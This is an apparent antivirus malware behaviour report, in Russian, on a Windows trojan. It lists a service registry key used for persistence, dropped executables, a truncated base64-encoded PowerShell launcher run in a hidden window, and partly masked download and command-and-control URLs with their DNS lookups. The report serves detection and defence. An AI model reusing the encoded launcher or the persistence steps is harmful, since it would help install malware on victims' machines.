Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\wmsgapi] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\wmsgapi] 'ImagePath' = '"%WINDIR%\SysWOW64\dmdskres\wmsgapi.exe"'
- 'wmsgapi' "%WINDIR%\SysWOW64\dmdskres\wmsgapi.exe"
- 'wmsgapi' %WINDIR%\SysWOW64\dmdskres\wmsgapi.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABYADMAZAB4AGIAaQBnAD0AKAAoACcARgAwACcAKwAnADIAJwApACsAKAAnAG8AMAAnACsAJwAyAGEAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFUAcwBFAHIAcABSAE8AZgBpAEwARQBcA...
- %HOMEPATH%\o44vk4w\ulj2hb1\iy44j7.exe
- %WINDIR%\syswow64\dmdskres\wmsgapi.exe
- %HOMEPATH%\o44vk4w\ulj2hb1\iy44j7.exe в %WINDIR%\syswow64\dmdskres\wmsgapi.exe
- '76.##8.54.203':80
- http://do####bingfu.com/wp-includes/w/
- http://gi#####hanksdaily.com/Q/
- http://un####database.net/wp-admin/dhJ/
- http://76.##8.54.203/AMFO9/7OnOW4dU8SY0z2nLBr/zEoLnzCaetzK2mTymQa/OzkG/BtHP1VVvQM/C3gmKxie8u9ACFKwH/
- DNS ASK do####bingfu.com
- DNS ASK gi#####hanksdaily.com
- DNS ASK un####database.net
- '%HOMEPATH%\o44vk4w\ulj2hb1\iy44j7.exe'
- '%WINDIR%\syswow64\dmdskres\wmsgapi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABYADMAZAB4AGIAaQBnAD0AKAAoACcARgAwACcAKwAnADIAJwApACsAKAAnAG8AMAAnACsAJwAyAGEAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFUAcwBFAHIAcABSAE8AZgBpAEwARQBcA...' (со скрытым окном)